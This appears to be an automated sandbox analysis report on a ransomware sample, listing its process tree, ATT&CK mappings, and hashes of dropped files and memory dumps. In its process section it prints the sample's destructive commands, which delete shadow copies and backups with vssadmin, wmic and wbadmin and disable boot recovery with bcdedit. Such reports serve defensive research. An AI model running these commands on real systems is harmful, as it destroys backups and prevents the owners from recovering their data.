PID 616 wrote to memory of 1744	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 456	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 456	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 456	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 2984	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 2984	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 2984	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 2480	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 2480	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 2480	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 456 wrote to memory of 4748	456	cmd.exe	WMIC.exe
PID 456 wrote to memory of 4748	456	cmd.exe	WMIC.exe
PID 456 wrote to memory of 4748	456	cmd.exe	WMIC.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe
"C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:616
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  2⤵
  PID:2480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
  2⤵
  PID:2984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
  2⤵
  PID:1744
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
  2⤵
  PID:4708
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
  2⤵
  PID:1484

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Network Service Discovery

1

T1046

Peripheral Device Discovery

Query Registry

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

1

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-768304381-2824894965-3840216961-1000\desktop.ini

Filesize
930B

MD5
cd88b51760bc2a2fcca1a7f87bc11a72

SHA1
5d9c985f84b50e22ac8a73ebf84540a2fa9d1ed6

SHA256
2db0bb385d7c468f80f1d1b6c8d6b1014b250e5097dc33396f67bfc6c1bedbdd

SHA512
a2b2b19098923f14d34dce7a2a530009e3fb40594a5186bb69c483513d894733d36fd8457518c04d87bb57f10c9bb0c9a63c78872c2d0de7bdd3348e9ca1b4c3

Download Submit
C:\$Recycle.Bin\S-1-5-21-768304381-2824894965-3840216961-1000\desktop.ini

Filesize
930B

MD5
0d8d289e6aa9da1068f6a094f69f1670

SHA1
d676ae6e30953ccaae2f483f5e36c02c64ea1d38

SHA256
903a4a7e28852f577936c73a4de1e51bf5df2c9124cb35d7492dd82cb86eec69

SHA512
368e55dacdc33ef1f7a66bd07b4506c9a3e8912d537e04a43812433a51d504ae3fd0eb28a8f6888f5a5e90a4b6c7556347dfb984237bc428ad78f486072515e9

Download Submit
C:\$Recycle.Bin\S-1-5-21-768304381-2824894965-3840216961-1000\how_to_decrypt.hta

Filesize
13KB

MD5
44a6b83020d4f25cafb6869295f44a3f

SHA1
489fed22d07835f0da1a7679ed7b8c54eb0aaf7d

SHA256
ffa114c0aea0138e2300ff7124d8e5354e1a5698484e47307c2fb58a345da16a

SHA512
c0ce0f7ddaef565d2cbb7425ec4208eb6973aa7c4e8e75526ad5ffdf279fead9fcfe559dee2865a65cedf27a43dc4f9c22145b3003a5b13c1d68daaa235523e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\c-1704318815.log

Filesize
1KB

MD5
416251992c72a849afbef2ef6709a456

SHA1
372e1f25e14afb29082ed326f487a569d274ec95

SHA256
853327c74d2a4976199ccb5d583267237d3cf5913866e0bd4d6f07feb7656e3e

SHA512
7f0972ac78684cbced4a03bdb39bf74c1368eeda0ce3ef1d75aa4c63c72d85e0074a20a0e767e5ca43cdf2babcc21db51c336a489aa6123b5695ac2793b270b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\c-1704318815.log

Filesize
4KB

MD5
2f56f45bfc6db4f5f7c1b5f304ea1a4b

SHA1
4d9cb4948f877afe1be85685cf5b4ba34662ab8b

SHA256
a85b6b4b39c0f45884243440387fd338518a6d9cd1e2bc5ee38575d113dc00ff

SHA512
54f550a0eb7e3393aba3c4a9fbaa25e825f05a5841e77a0a4a825f0d1756a48ada8350f19119899656466b7bddd115556906d5b9d39b12966247f9880b42a5cd

Download Submit
memory/616-15-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-6308-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-14-0x0000000074540000-0x0000000074548000-memory.dmp

Filesize
32KB

Download
memory/616-1161-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-5190-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-11-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-5532-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-1-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-6266-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-3-0x0000000074530000-0x000000007453E000-memory.dmp

Filesize
56KB

Download
memory/616-6457-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-6461-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-6465-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-2-0x0000000075DB0000-0x0000000075E41000-memory.dmp

Filesize
580KB

Download
memory/616-6473-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-6747-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/616-6760-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads